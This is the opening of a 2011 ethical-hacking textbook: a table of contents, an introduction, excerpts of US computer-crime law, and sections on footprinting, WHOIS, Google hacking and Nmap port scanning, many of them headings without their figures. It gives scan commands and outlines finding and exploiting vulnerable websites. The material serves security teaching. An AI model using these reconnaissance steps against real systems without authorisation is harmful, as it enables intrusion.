Hacker techniques, exploit and incident handling

HACKER
TECHNIQUES,
EXPLOIT AND
INCIDENT
HANDELING
D e f e n s i a
2 0 1 1
Rafel Ivgi
This book introduces the world of hacking and involves
the reader with the current players, the rules of the
game, motivation and new trends.

1 | P a g e
TABLE OF CONTENTS
Introduction to Ethical Hacking Problem Definition – Why? ........................................................ 11
How does a hacker see the world? ........................................................................................... 11
Hacking - Laws www.usdoj.gov..................................................................................................... 12
United States of America: Securely Protect Yourself against - Cyber Trespass Act (SPY ACT). 12
U.S. Federal Laws....................................................................................................................... 13
Section 1029.......................................................................................................................... 13
Section 1030.......................................................................................................................... 14
18 U.S.C. §1362...................................................................................................................... 17
18 U.S.C. §2318 - Trafficking in counterfeit…........................................................................ 18
18 U.S.C. §2320 - Trademark Offenses Trafficking in counterfeit goods or services ............ 18
18 U.S.C. §1831 - Trade Secret Offenses Economic espionage Law...................................... 18
47 U.S.C. §605 - Unauthorized publication or use of communications ................................ 18
Foot-printing visiting Reconnaissance........................................................................................... 20
Foot-Printing each Service Server Software Name and Version............................................... 20
Foot-Printing HTTP Servers.................................................................................................... 20
Foot-Printing FTP Servers...................................................................................................... 23
Foot-Printing Telnet Servers.................................................................................................. 23
Fingerprinting VoIP Servers:...................................................................................................... 24
Fingerprinting Products of Specific Vendors:............................................................................ 24
WHOIS ....................................................................................................................................... 28
Google Hacking What is Google hacking....................................................................................... 32
Finding Old Vulnerable Web Pages / Fast & Passive Web Crawling/Spidering......................... 32
Finding Login Interfaces......................................................................................................... 33
Finding Exploitable Vulnerable Web Systems by Signature...................................................... 34
Choosing a public exploit:...................................................................................................... 34
Finding the a vulnerable website .......................................................................................... 35
Verifying the vulnerability exists........................................................................................... 37
Exploiting the Vulnerability ................................................................................................... 38
Opening a free hosting account ............................................................................................ 38
Finding Cameras........................................................................................................................ 41
Finding Password Files............................................................................................................... 43

2 | P a g e
Scanning and Scanning Definition................................................................................................. 46
Enumeration Overview of System Hacking Cycle.......................................................................... 48
Enumerating the allowed HTTP Methods on a Web Server:..................................................... 48
Enumerating Usernames Using Google..................................................................................... 49
Exposed Configuration Files .................................................................................................. 49
Company Email Addresses: ................................................................................................... 50
SMTP Enumeration (VRFY, EXPN, RCPT TO, NDR)..................................................................... 51
Using the SMTP VRFY Command........................................................................................... 51
Using the SMTP EXPN Command .......................................................................................... 52
Using the SMTP RCPT TO Command ..................................................................................... 53
Non Delivery Response (NDR)............................................................................................... 54
POP3 Enumeration .................................................................................................................... 54
Private User Directories............................................................................................................. 56
Apache User Enumeration..................................................................................................... 56
WordPress Authors Template User Enumeration Vulnerability ........................................... 56
FTP............................................................................................................................................. 58
CWD Username Enumeration Vulnerability (Example: Solaris in.ftpd) ................................ 58
FTP Server Authentication Delay Username Enumeration Vulnerability (Example: ProFTPD)
............................................................................................................................................... 58
Telnet......................................................................................................................................... 58
Telnet Server User Field Account Enumeration (Example: Cisco Aironet)............................ 58
Web Server Pre-Login – HTTP Response based enumeration (Example: Lotus Domini) .......... 58
Error Message User Enumeration:............................................................................................ 59
NetBIOS User Enumeration....................................................................................................... 59
Mcafee FoundStone SuperScan 4: ........................................................................................ 61
NetBIOS Enumerator............................................................................................................. 62
GFI Languard.......................................................................................................................... 63
SNMP Enumeration................................................................................................................... 63
DNS Enumeration...................................................................................................................... 64
Dictionary Based DNS Enumeration...................................................................................... 65
Brute Forcing DNS Sub-Domains............................................................................................... 65
VoIP User Enumeration ............................................................................................................. 66

3 | P a g e
Enumerating Extensions:....................................................................................................... 66
Enumerate Usernames: (Example: Inter Asterisk Exchange protocol) ................................. 66
Citrix Published Applications Remote Enumeration ................................................................. 67
System Hacking Part 1- Cracking Password................................................................................... 69
Brute Forcing Passwords – Telnet:............................................................................................ 69
Cracking Accounts Using Hydra................................................................................................. 69
Cracking Accounts Using Medusa: ............................................................................................ 70
Brute Forcing Check Point Client Authentication Remote Service............................................ 71
Brute Forcing Citrix ICA Servers................................................................................................. 71
Trojans and Backdoors Effect on Business.................................................................................... 76
Auto Dialers............................................................................................................................... 77
FraudWare................................................................................................................................. 77
Keylogger................................................................................................................................... 78
Spyware & Browser Trojans ...................................................................................................... 79
Trojans....................................................................................................................................... 79
Password Stealers...................................................................................................................... 79
RansomWare............................................................................................................................. 80
Viruses and Worms Virus History.................................................................................................. 82
Local Replicating Viruses ........................................................................................................... 82
Worms....................................................................................................................................... 83
Antivirus..................................................................................................................................... 83
Packers/Crypters – Bypassing Anti-Viruses............................................................................... 84
Netcat - Original – Less Then Packed .................................................................................... 85
Netcat * RDG PolyPack v1.1 .................................................................................................. 88
Poison Ivy............................................................................................................................... 89
SCPack 1.1.............................................................................................................................. 89
Alternate EXE Packer............................................................................................................. 91
Alternate EXE Packer............................................................................................................. 92
Poison Ivy * MEW.................................................................................................................. 93
Poison Ivy * ACprotect .......................................................................................................... 94
sixxpack v2.2Eng.................................................................................................................... 95
DotFuscator............................................................................................................................... 95

4 | P a g e
Sniffers Definition – Sniffing.......................................................................................................... 98
Man in the Middle..................................................................................................................... 98
Hub vs. Switch ........................................................................................................................... 98
MAC Spoofing............................................................................................................................ 99
MAC Flooding / CAM Table Overflow...................................................................................... 100
Description .......................................................................................................................... 100
MAC Flooding ...................................................................................................................... 100
Port Stealing ............................................................................................................................ 102
STP mangling ........................................................................................................................... 104
Address Resolution Protocol (ARP) Spoofing .......................................................................... 104
IP Spoofing............................................................................................................................... 105
VLANS ...................................................................................................................................... 106
ICMP Redirect.......................................................................................................................... 107
Public Key Exchanging ............................................................................................................. 109
Command Injection ................................................................................................................. 110
Malicious Code Injection......................................................................................................... 110
Downgrade Attacks - SSH V2 to V1 ......................................................................................... 110
Downgrade Attacks - SSH V2 to V1...................................................................................... 110
Downgrade Attacks - IPSEC Failure ......................................................................................... 110
Downgrade Attacks – PPTP ..................................................................................................... 111
PPTP:.................................................................................................................................... 111
Social Engineering ....................................................................................................................... 112
Email Spoofing......................................................................................................................... 112
Social Engineering Tool-Kit...................................................................................................... 114
Tab-Nabbing ............................................................................................................................ 119
ClickJacking / Interface Spoofing............................................................................................. 119
Phishing ....................................................................................................................................... 121
Diversion theft......................................................................................................................... 121
Quid pro quo ........................................................................................................................... 122
Social Engineering - Source Validation.................................................................................... 122
Pretexting – Collecting Names, Emails & Phone Numbers ..................................................... 123
Pretexting – Collecting Names & Roles ................................................................................... 124

5 | P a g e
Target and Attack .................................................................................................................... 125
Social Engineering by Phone ................................................................................................... 126
Dumpster Diving...................................................................................................................... 127
On-Line Social Engineering...................................................................................................... 127
Persuasion ............................................................................................................................... 128
Reverse Social Engineering...................................................................................................... 129
Hacking Email Accounts............................................................................................................... 130
Key-logging: The Easiest Way! ................................................................................................ 130
Phishing: The Difficult Way ..................................................................................................... 130
Common Myths and Scams Associated with Email Hacking ................................................... 130
Denial-of-Service Real World Scenario of D.o.S Attacks ............................................................. 132
Ping of Death........................................................................................................................... 132
Permanent denial-of-service attacks – PDOS.......................................................................... 132
IP Spoofing............................................................................................................................... 133
Land Attack.............................................................................................................................. 133
SYN Flood................................................................................................................................. 134
SYN Flood + IP Spoofing........................................................................................................... 136
Reflected attack: Source IP Spoofing + SYN Sent .................................................................... 137
Distributed attack – DDOS....................................................................................................... 138
Amplification/Smurf attack ..................................................................................................... 140
Session Hi-Jacking - What is Session Hi-Jacking?......................................................................... 142
Hacking Web Servers How Web Servers Work ........................................................................... 148
Components of a generic web application system ................................................................. 148
URL mappings to the web application system ........................................................................ 149
Flowchart for a one-way web hack ......................................................................................... 150
Finding the entry point............................................................................................................ 151
Exploiting poorly validated input parameters..................................................................... 152
Exploiting SQL injection....................................................................................................... 152
Invoking the command interpreter..................................................................................... 153
Posting commands to CMD.EXE .......................................................................................... 153
Posting commands to /bin/sh ............................................................................................. 154
Automating the POST process............................................................................................. 155

6 | P a g e
Output of post_cmd.pl ........................................................................................................ 155
Web based command prompt............................................................................................. 157
Perl - perl_shell.cgi .............................................................................................................. 157
ASP - cmdasp.asp................................................................................................................. 158
PHP - sys.php....................................................................................................................... 160
JSP - cmdexec.jsp................................................................................................................. 160
Installing the Web based command prompt....................................................................... 161
Re-creating arbitrary binary files......................................................................................... 162
File uploader............................................................................................................................ 162
ASP - upload.asp and upload.inc ......................................................................................... 162
Perl - upload.cgi................................................................................................................... 163
PHP - upload.php................................................................................................................. 164
One-Way Privilege Escalation.................................................................................................. 165
Web Application Vulnerabilities Web Application Setup............................................................ 169
XSS – Cross-Site-Scripting........................................................................................................ 169
Introduction......................................................................................................................... 169
Reflected XSS (Type I).......................................................................................................... 169
Permanent (Stored) XSS ...................................................................................................... 170
DOM XSS.............................................................................................................................. 170
XSS-Shell .............................................................................................................................. 170
XSS Worms........................................................................................................................... 171
The Future of SPAM............................................................................................................. 171
D.o.S attacks........................................................................................................................ 172
Information Gathering......................................................................................................... 173
Automated exploiting bots.................................................................................................. 173
Malware Script Detector ..................................................................................................... 174
Cross Site Request Forgery (CSRF/XSRF/Session Riding)......................................................... 174
Introduction......................................................................................................................... 174
The risks and common uses ................................................................................................ 175
Tokens vs. Personal Information as a solution for CSRF ..................................................... 176
Open/Un-Validated Site Redirection / Cross Domain Redirect............................................... 177
Common uses and Risks ...................................................................................................... 178

7 | P a g e
Validating Redirects and Forwards...................................................................................... 179
SQL-injection - What is SQL Injection? ........................................................................................ 180
Introduction............................................................................................................................. 180
The Practice............................................................................................................................. 181
Error Based SQL Injection.................................................................................................... 181
Union Based SQL Injection .................................................................................................. 181
Taking Over the Machine .................................................................................................... 182
SQL injection as a lead to other vulnerabilities....................................................................... 183
SQL injection Automated tools................................................................................................ 183
SQL injection Prevention......................................................................................................... 185
Web-Based Password Cracking Techniques Authentication – Definition.................................. 186
Hacking Wireless Networks......................................................................................................... 193
Introduction............................................................................................................................. 193
Wireless LAN Overview ........................................................................................................... 193
Stations and Access Points .................................................................................................. 194
Channels .............................................................................................................................. 194
WEP ..................................................................................................................................... 194
Infrastructure and Ad Hoc Modes....................................................................................... 194
Frames................................................................................................................................. 195
Authentication..................................................................................................................... 195
Association .......................................................................................................................... 196
Wireless Network Sniffing....................................................................................................... 197
Passive Scanning.................................................................................................................. 197
Detection of SSID................................................................................................................. 198
Collecting the MAC Addresses............................................................................................. 198
Collecting the Frames for Cracking WEP ............................................................................. 199
Detection of the Sniffers ..................................................................................................... 200
Wireless Spoofing.................................................................................................................... 200
MAC Address Spoofing........................................................................................................ 200
IP spoofing........................................................................................................................... 200
Frame Spoofing.................................................................................................................... 201
Wireless Network Probing....................................................................................................... 201

8 | P a g e
Detection of SSID................................................................................................................. 202
Detection of Probing ........................................................................................................... 202
AP Weaknesses........................................................................................................................ 202
Configuration....................................................................................................................... 203
Defeating MAC Filtering ...................................................................................................... 203
Rogue AP ............................................................................................................................. 203
Trojan AP ............................................................................................................................. 203
Equipment Flaws ................................................................................................................. 203
Denial of Service...................................................................................................................... 204
Jamming the Air Waves....................................................................................................... 204
Flooding with Associations.................................................................................................. 204
Forged Dissociation ............................................................................................................. 205
Forged De-Authentication................................................................................................... 205
Power Saving ....................................................................................................................... 205
Man-in-the-Middle Attacks ..................................................................................................... 205
Wireless MITM .................................................................................................................... 206
ARP Poisoning...................................................................................................................... 206
Session Hijacking ................................................................................................................. 207
War Driving.............................................................................................................................. 207
War chalking........................................................................................................................ 208
Typical Equipment............................................................................................................... 208
Wireless Security Best Practices.............................................................................................. 209
Location of the APs.............................................................................................................. 209
Proper Configuration........................................................................................................... 209
Secure Protocols.................................................................................................................. 210
Wireless IDS......................................................................................................................... 210
Wireless Auditing................................................................................................................. 211
Newer Standards and Protocols.......................................................................................... 211
Software Tools..................................................................................................................... 211
Conclusion ............................................................................................................................... 212
Physical Security.......................................................................................................................... 213
Dumpster diving ...................................................................................................................... 213

9 | P a g e
Overt document stealing......................................................................................................... 213
CRT vs. LCD vs. LED – Remote Screen Eavesdropping............................................................. 213
Ethernet vs. Optic Fibers ......................................................................................................... 214
Linux Hacking - Why Linux?......................................................................................................... 217
Linux/Apache privilege escalation........................................................................................... 217
Uploading the UNIX attack tools............................................................................................. 217
ptrace1.c.............................................................................................................................. 217
Evading IDS, Firewalls and Detecting Honey Pots Introduction to Intrusion.............................. 223
Introduction............................................................................................................................. 223
Honeypots versus steganography ........................................................................................... 223
Tools .................................................................................................................................... 224
User Mode Linux (UML)....................................................................................................... 224
VMware ............................................................................................................................... 227
Detecting additional lines of defense: chroot and jails....................................................... 229
Practical examples (continued) ............................................................................................... 230
Sebek-based Honeypots...................................................................................................... 230
Snort_inline ......................................................................................................................... 231
Fake AP ................................................................................................................................ 232
Bait and Switch Honeypots.................................................................................................. 232
Summary.................................................................................................................................. 233
Conclusion ............................................................................................................................... 234
Buffer Overflows Why is Programs/Applications Vulnerable?.................................................... 235
Verify the bug.......................................................................................................................... 235
Verify the bug – and see if it could be interesting .................................................................. 236
Before we proceed – some theory.......................................................................................... 236
Process Memory.................................................................................................................. 237
The Stack ............................................................................................................................. 239
The debugger....................................................................................................................... 247
Determining the buffer size to write exactly into EIP ......................................................... 251
Find memory space to host the shellcode .......................................................................... 255
Jump to the shellcode in a reliable way .................................................................................. 258
Get shellcode and finalize the exploit ..................................................................................... 263

10 | P a g e
What if you want to do something else than launching calc? ................................................ 265
Heap Overflows....................................................................................................................... 270
Exploiting Heap Overflows .................................................................................................. 271
Off-By-One............................................................................................................................... 275
Signed vs. Un-Signed ............................................................................................................... 275
Memory Protection Mechanisms............................................................................................ 276
Security Cookie (Canary) ..................................................................................................... 276
SafeSEH................................................................................................................................ 277
Address Space Layout Randomization (ASLR) ..................................................................... 278
NX (No eXecute – Hardware DEP)....................................................................................... 279
NX – In Sun VM Environment.............................................................................................. 280
NX – Process Support .......................................................................................................... 281
Cryptography............................................................................................................................... 282
Hash......................................................................................................................................... 282
MD5 HASH “Reverse”.............................................................................................................. 282
Rainbow Tables ....................................................................................................................... 284

11 | P a g e
Introduction to Ethical Hacking Problem Definition – Why?
In the past, hackers were kids who hacked in order to prove themselves as the smartest
community and the best technologists. After they succeeded in remotely penetrating into the
organization and gained control over an organization’s machine, they would usually stop there
and keep the vulnerability information for themselves or within their close community circle.
Today, Hackers are people at all ages, motivated mostly by money. Where in past times a White-
Hat hacker known as a “Security Researcher” would publish an information security advisory for
free, to make himself a reputation and create new career opportunities, today those security
vulnerabilities are worth tens of thousands of dollars and are sold to private companies.
In resemblance to the hacking scene, the cracking scene has also changed, where in the past the
cracking scene was compiled of a few famous group such as Myth, Fair-Light, Divine, Deviance,
Paradigm which were mostly collections of teenagers interested in software piracy, who
believed in creating “a money free world where all computer games and software are available
to the rich and the poor”. Today, the cracking scene has shrunk to its core and most of the crack
download portals are driven by organized crime which deliberately provides free software
cracks with a Trojan downloader, creating computerized armies controlled by a botnet.
How does a hacker see the world?
The world’s computer industries work to provide solutions to the needs of normal users. The
solution begins with an initiative/startup venture which is designed by the Chief Architect and
passed down the chain to a product manager which defines the user needs and the optimal user
experience, down to a software developer who implements the defined requirements in
practice. It is important to remember that all of the people in this chain are normal people, who
have a unified mission: creating a specific solution for a user/organization.
A true hacker, is not a user and is not just a developer, not just an architect, he is all of them
when it regards to the system’s security. The hacker reviews the system and inspects the way
the information flows between each level of the system as a whole, from the application level all
the way down to the bits leaving the machine’s network interface. For the hacker, the graphical
user interface is just a mask for the underlying truth to discover by using hacking tools.
A system could run on production for years and be used by thousands of normal and advanced
users without noticing an obvious security flaw that a hacker can pick up in just a few minutes,
that is why a system that wasn’t approved for used by a hacker, is not safe from one.

12 | P a g e
Hacking - Laws www.usdoj.gov
United States of America:
Securely Protect Yourself against - Cyber Trespass Act (SPY ACT)
SEC. 2. PROHIBITION OF [UNFAIR OR] DECEPTIVE ACTS OR PRACTICES RELATING TO SPYWARE.
(a) Prohibition- It is unlawful for any person, who is not the owner or authorized user of a
protected computer, to engage in unfair or deceptive acts or practices that involve any
of the following conduct with respect to the protected computer:
(1) Taking control of the computer by:
(a) Utilizing a computer to send unsolicited information or material from the
computers to other computers
(B) Diverting the Internet browser of the computer, or similar program of the
computer used to access and navigate the Internet:
(i) Without authorization of the owner or authorized user of the
computer; and
(ii) away from the site the user intended to view, to one or more other
Web pages, such that the user is prevented from viewing the content at
the intended web page, unless such diversion it otherwise authorized.
(C) accessing, hijacking, or otherwise using the modem, or Internet connection
or service, for the computer and thereby causing damage to the computer or
causing the owner or authorized user or a third party defrauded by such
conduct to incur charges or other costs for a service that is not authorized by
such owner or authorized user;
(E) Delivering advertisements that a user of the computer cannot close without
undue effort or knowledge by the user or without turning off the computer or
closing all sessions of the Internet browser for the computer.
– (2) Modifying settings related to use of the computer or to the computer's
access to or use of the Internet by altering:
– (A) the Web page that appears when the owner or authorized user
launches an Internet browser or similar program used to access and
navigate the Internet;
– (B) the default provider used to access or search the Internet, or other
existing Internet connections settings;

13 | P a g e
– (3) Collecting personally identifiable information through the use of a
keystroke logging function
- (4) Inducing the owner or authorized user of a computer to disclose personally
identifiable information by means of a webpage that:
- (A) is substantially similar to a Web page established or provided by
another person; and
- (b) misleads the owner or authorized user that such Web page is
provided by such other person
U.S. Federal Laws
• 18 U.S.C §1029. Fraud and Related Activity in Connection with Access Devices
• 18 U.S.C §1030. Fraud and Related Activity in Connection with Computers
• 18 U.S.C §1362. Communication Lines, Stations, or Systems
• 18 U.S.C §2510. et seq. Wire and Electronic Communications Interception and
Interception of Oral Communications
• 18 U.S.C §2701 et seq. Stored Wire and Electronic Communications and Transactional
Records Access
Section 1029
Subsection (a) who will:
(1) Knowingly and with intent to defraud produces, uses, or traffics in one or more
counterfeit access devices;
(2) knowingly and with intent to defraud traffics in or uses one or more unauthorized
access devices during any one-year period, and by such conduct obtains anything of
value aggregating $1,000 or more during that period;
(3) Knowingly and with intent to defraud possesses fifteen or more devices which are
counterfeit or unauthorized access devices;
(4) Knowingly, and with intent to defraud, produces, traffics in, has control or custody
of, or possesses device-making equipment;
(5) knowingly and with intent to defraud effects transactions, with 1 or more access
devices issued to another person or persons, to receive payment or any other thing of
value during any 1-year period the aggregate value of which is equal to or greater than
$1,000;
(6) Without the authorization of the issuer of the access device, knowingly and with
intent to defraud solicits a person for the purpose of:

14 | P a g e
(A) Offering an access device; or
(B) Selling information regarding or an application to obtain an access device;
(7) Knowingly and with intent to defraud uses, produces, traffics in, has control or
custody of, or possesses a telecommunications instrument that has been modified or
altered to obtain unauthorized use of telecommunications services;
(8) Knowingly and with intent to defraud uses, produces, traffics in, has control or
custody of, or possesses a scanning receiver;
(9) Knowingly uses, produces, traffics in, has control or custody of, or possesses
hardware or software, knowing it has been configured to insert or modify
telecommunication identifying information associated with or contained in a
telecommunications instrument so that such instrument may be used to obtain
telecommunications service without authorization; or
(10) Without the authorization of the credit card system member or its agent, knowingly
and with intent to defraud causes or arranges for another person to present to the
member or its agent, for payment, 1 or more evidences or records of transactions made
by an access device.
The Punishments:
(A) In the case of an offense that does not occur after a conviction for another offense
under this section:
(i) If the offense is under paragraph (1), (2), (3), (6), (7), or (10) of subsection (a),
a fine under this title or imprisonment for not more than 10 years, or both; and
(ii) If the offense is under paragraph (4), (5), (8), or (9) of subsection (a), a fine
under this title or imprisonment for not more than 15 years, or both;
(B) in the case of an offense that occurs after a conviction for another offense under this
section, a fine under this title or imprisonment for not more than 20 years, or both; and
(C) in either case, forfeiture to the United States of any personal property used or
intended to be used to commit the offense
Section 1030
Subsection (1): having knowingly accessed a computer without authorization or exceeding
authorized access, and by means of such conduct having obtained information that has been
determined by the United States Government pursuant to an Executive order or statute to
require protection against unauthorized disclosure for reasons of national defense or foreign

15 | P a g e
relations, or any restricted data, as defined in paragraph y of section 11 of the Atomic Energy
Act of 1954, with reason to believe that such information so obtained could be used to the
injury of the United States, or to the advantage of any foreign nation willfully communicates,
delivers, transmits, or causes to be communicated, delivered, or transmitted, or attempts to
communicate, deliver, transmit or cause to be communicated, delivered, or transmitted the
same to any person not entitled to receive it, or willfully retains the same and fails to deliver it
to the officer or employee of the United States entitled to receive it;
(2) (A) (B) (C):
(2) Intentionally accesses a computer without authorization or exceeds authorized
access, and thereby obtains:
(A) information contained in a financial record of a financial institution, or of a
card issuer as defined in section 1602(n) of title 15, or contained in a file of a
consumer reporting agency on a consumer, as such terms are defined in the Fair
Credit Reporting Act (15 U.S.C. 1681 et seq.);
(B) Information from any department or agency of the United States; or
(C) Information from any protected computer if the conduct involved an
interstate or foreign communication;
(3) intentionally, without authorization to access any nonpublic computer of a
department or agency of the United States, accesses such a computer of that
department or agency that is exclusively for the use of the Government of the United
States or, in the case of a computer not exclusively for such use, is used by or for the
Government of the United States and such conduct affects that use by or for the
Government of the United States;
(4) knowingly and with intent to defraud, accesses a protected computer without
authorization, or exceeds authorized access, and by means of such conduct furthers the
intended fraud and obtains anything of value, unless the object of the fraud and the
thing obtained consists only of the use of the computer and the value of such use is not
more than $5,000 in any 1-year period;
(5)(A)(i) Knowingly causes the transmission of a program, information, code, or
command, and as a result of such conduct, intentionally causes damage without
authorization, to a protected computer
(ii) intentionally accesses a protected computer without authorization, and as a
result of such conduct, recklessly causes damage; or
(iii) Intentionally access a protected computer without authorization, and as a
result of such conduct, causes damage; and

16 | P a g e
(5)(B) By conduct described in clause (i), (ii), or (iii) of subparagraph (A), caused (or, in
the case of an attempted offense, would, if completed, have caused):
(i) loss to 1 or more persons during any 1-year period (and, for purposes of an
investigation, prosecution, or other proceeding brought by the United States
only, loss resulting from a related course of conduct affecting 1 or more other
protected computers) aggregating at least $5,000 in value;
(ii) The modification or impairment, or potential modification or impairment, of
the medical examination, diagnosis, treatment, or care of 1 or more individuals;
(iii) physical injury to any person;
(iv) a threat to public health or safety; or
(v) damage affecting a computer system used by or for a government entity in
furtherance of the administration of justice, national defense, or national
security;
(6) Knowingly and with intent to defraud traffics (as defined in section 1029) in any
password or similar information through which a computer may be accessed without
authorization, if:
(A) Such trafficking affects interstate or foreign commerce; or
(B) such computer is used by or for the Government of the United States;
(7) With intent to extort from any person any money or other thing of value, transmits
in interstate or foreign commerce any communication containing any threat to cause
damage to a protected computer;
The Punishments:
(1)(A) a fine under this title or imprisonment for not more than ten years, or both, in the
case of an offense under subsection (a)(1) of this section which does not occur after a
conviction for another offense under this section, or an attempt to commit an offense
punishable under this subparagraph; and
(B) a fine under this title or imprisonment for not more than twenty years, or both, in
the case of an offense under subsection (a)(1) of this section which occurs after a
conviction for another offense under this section, or an attempt to commit an offense
punishable under this subparagraph;
(2)(A) except as provided in subparagraph (B), a fine under this title or imprisonment for
not more than one year, or both, in the case of an offense under subsection (a)(2),
(a)(3), (a)(5)(A)(iii), or (a)(6) of this section which does not occur after a conviction for

17 | P a g e
another offense under this section, or an attempt to commit an offense punishable
under this subparagraph;
(B) a fine under this title or imprisonment for not more than 5 years, or both, in the case
of an offense under subsection (a)(2), or an attempt to commit an offense punishable
under this subparagraph, if:
• (i) the offense was committed for purposes of commercial advantage or
private financial gain;
• (ii) The offense was committed in furtherance of any criminal or tortuous act
in violation of the Constitution or laws of the United States or of any State; or
• (iii) The value of the information obtained exceeds $5,000;
(C) a fine under this title or imprisonment for not more than ten years, or both, in the
case of an offense under subsection (a)(2), (a)(3) or (a)(6) of this section which occurs
after a conviction for another offense under this section, or an attempt to commit an
offense punishable under this subparagraph;
(3)(A) a fine under this title or imprisonment for not more than five years, or both, in the
case of an offense under subsection (a)(4) or (a)(7) of this section which does not occur
after a conviction for another offense under this section, or an attempt to commit an
offense punishable under this subparagraph; and (3)(B) a fine under this title or
imprisonment for not more than ten years, or both, in the case of an offense under
subsection (a)(4), (a)(5)(A)(iii), or (a)(7) of this section which occurs after a conviction for
another offense under this section, or an attempt to commit an offense punishable
under this subparagraph; and
18 U.S.C. §1362
This law applies when:
• Person willfully injures or destroys any of the works, property, or material of any
means of communication
• Maliciously obstructs, hinders, or delays the transmission of any communication
Punishment:
• A fine or imprisonment for not more than 10 years, or both

18 | P a g e
18 U.S.C. §2318 - Trafficking in counterfeit…
Label for phone records, copies of computer programs or computer program documentation or
packaging, and copies of motion pictures or other audio visual works, and trafficking in
counterfeit computer program documentation or packaging
• Person knowingly traffics in a counterfeit label affixed or designed to be affixed
• Intentionally traffics in counterfeit documentation or packaging for a computer
program
Punishment:
• A financial fine or imprisoned for not more than five years both
18 U.S.C. §2320 - Trademark Offenses Trafficking in counterfeit goods or services
• Person intentionally traffics or attempts to traffic in goods or services
• Knowingly uses a counterfeit mark
Punishment:
• A financial fine of not more than $2,000,000 or imprisoned not more than 10 years, or
both
18 U.S.C. §1831 - Trade Secret Offenses Economic espionage Law
• Person knowingly steals or without authorization obtains a trade secret
• Without authorization copies or transmits a trade secret
• Receives, buys, or possesses a trade secret
Punishment:
• A financial fine of not more than $10,000,000
47 U.S.C. §605 - Unauthorized publication or use of communications

19 | P a g e
• Receiving, assisting in receiving, transmitting, or assisting in transmitting, any
interstate or foreign communication by wire or radio
• Intercepting any radio communication and divulging or publishing the existence,
contents, substance, purport, effect, or meaning of such intercepted communication
to any person
• Scrambling of Public Broadcasting Service programming
Punishment:
• A financial fine of not more than $2,000 or imprisoned for not more than 6 months, or
both
More US Laws:
• Federal Managers Financial Integrity Act of 1982
• The Freedom of Information Act [5 U.S.C.§552]
• Federal Information Security Management Act (FISMA)
• The Privacy Act Of 1974 [5 U.S.C.§552a]
• USA Patriot Act of 2001
• Government Paperwork Elimination Act (GPEA)
European Union:
• SUBSTANTIVE CRIMINAL LAW
o Offences against the confidentiality, integrity and availability of computer data
and systems
o illegal Access: Each Party shall adopt such legislative and other measures as may
be necessary to establish as criminal offences under its domestic law, when
committed intentionally, the access to the whole or any part of a computer
system without right
o Illegal Interception
o Data Interference
UK:
• Computer Misuse Act 1990
• Police and Justice Act 2006

20 | P a g e
Foot-printing visiting Reconnaissance
Reconnaissance is the step where the attacker attempts to retrieve as much information as
possible on the target. Reconnaissance is truly an art and is one of the most important stages of
the attack process. It is the eyes of the hacker on the hacking court and without it he must
attack blindly, minimizing the odds of success to its minimum.
Foot-Printing each Service Server Software Name and Version
Foot-Printing HTTP Servers
Getting the server type and disclosing internal information such as the local machine’s internal name, internal IP, usage of
a proxy or a reverse proxy and etc…
The following error page reveals that the server is Apache Tomcat, the Machine’s internal name and that the error source
was the proxy component:
The following reveals the server’s type and its exact version:

21 | P a g e
It is possible to change the values of the request parameters, retrieve application errors and
determine the operating system and the local path of the website root folder:
It is possible to identify the server type, the development platform, and installed plugins by
inspecting the returned HTTP headers and the supported HTTP Methods.

23 | P a g e
Foot-Printing FTP Servers
The server’s banner header, which contains the server name and version, is exposed by default on most File Transfer
Protocol (FTP) servers. This means that all that an attacker is required to do is connect to the server and analyze the first
non-empty line of text. For Example:
220-Serv-U FTP Server v6.4 for WinSock ready...
220-Welcome to XXXXX, home of Your FTP Server
220-
220 Local time is 13:36:08,
Foot-Printing Telnet Servers
Some telnet servers have banners revealing the name of the vendor, organization or product:

24 | P a g e
Some servers have a scary warning message which may be used to identify the product or
remotely identify that several machines belong to the same organization. For Example:
Fingerprinting VoIP Servers:
One of the most VoIP security assessment toolkits is called SIP-Vicious.
Fingerprinting Products of Specific Vendors:
It is possible to identify specific vendors by common texts or messages used by that vendor for
title, errors and authentication requests. For example, a web server with “Basic Authentication”
on practically every cisco product will have the message “level_15_access”, by default:

25 | P a g e
Using ZenMap (Nmap GUI) to fingerprint the exact type and product version:
Scanning for “listening on TCP port 990, finds a Brute-Force-able Check Point Firewall VPN:

26 | P a g e
On some implementations it is reconfigured to listen on port 80:
Scanning for “Check Point Certificate Services” listening on TCP port 18264 has always proved
itself for finding Check-Point firewalls:

28 | P a g e
Identifying Check Point VPN-1 Edge Portal
WHOIS
Any IP and Domain on internet are registered to someone. It is possible to query the public
databases and retrieve information about the owner of an IP or Domain. Querying IPs is mostly
called “IP WHOIS” or “Inet-WHOIS” and querying domain names is called “Domain WHOIS” or
“Inic-WHOIS”.
An attacker is able to retrieve network information with an information gathering tools such as
Dmitry:

29 | P a g e
Where Inic-WHOIS might be masked/private/proxied/censored:
The Inet-WHOIS might not be:

30 | P a g e
Or by using a free public online service such as:
http://www.dnsstuff.com
http://www.dnstools.com
http://www.centralops.net
For Example:

32 | P a g e
Google Hacking What is Google hacking
Finding Old Vulnerable Web Pages / Fast & Passive Web Crawling/Spidering

33 | P a g e
Finding Login Interfaces

34 | P a g e
Finding Exploitable Vulnerable Web Systems by Signature
Choosing a public exploit:

35 | P a g e
Finding the a vulnerable website
Finding a vulnerable machine as the exploitation target can be done by using Google to find
websites containing a similar long path or directory tree:

36 | P a g e
Alternately, the vulnerable website can be found by using the “Powered by” signature of open
source projects:

37 | P a g e
Verifying the vulnerability exists

38 | P a g e
Exploiting the Vulnerability
Opening a free hosting account

39 | P a g e
Local File Inclusion Example:

43 | P a g e
Finding Password Files

46 | P a g e
Scanning and Scanning Definition
The term scanning refers to the phase of discovering machines, protocols and ports existing in
an accessible computer network. Port Scanning is an art and a crucial part of the reconnaissance
process. Many junior information security personnel tend to make mistake during the scanning
process and do not discover certain machines and services, which results in vulnerabilities not
found and therefore not repaired.
The common scanning concept relies on the idea that a certain service is listening on a default
port number and by successfully connecting to that port number it is a reasonable to assume
that it is the expected service. In order to positively identify the true service listening on the port
scanners sends the “Hello Message” of all the known protocols in its database until it gets a
response in the same protocol.
The most famous scanner is Nmap, which has been developed since 1997 and supports
practically every known port scanning method. Two most common port scanning methods are
the SYN scan and Connect scan.
• Connect Scan: Nmap –PN –open –v –A –p1-65535 –sT <ip>
o Slower
o 100% Reliable (if you can connect than it is publicly open)
o Allows Inquiring the true underlying service
o Can be implemented using any programming language (even JavaScript)
• SYN Scan: Nmap –PN –open –v –A –p1-65535 –sS <ip>
o Fastest scanning method
o Sends only one packet for each port
o Requires a driver to be installed
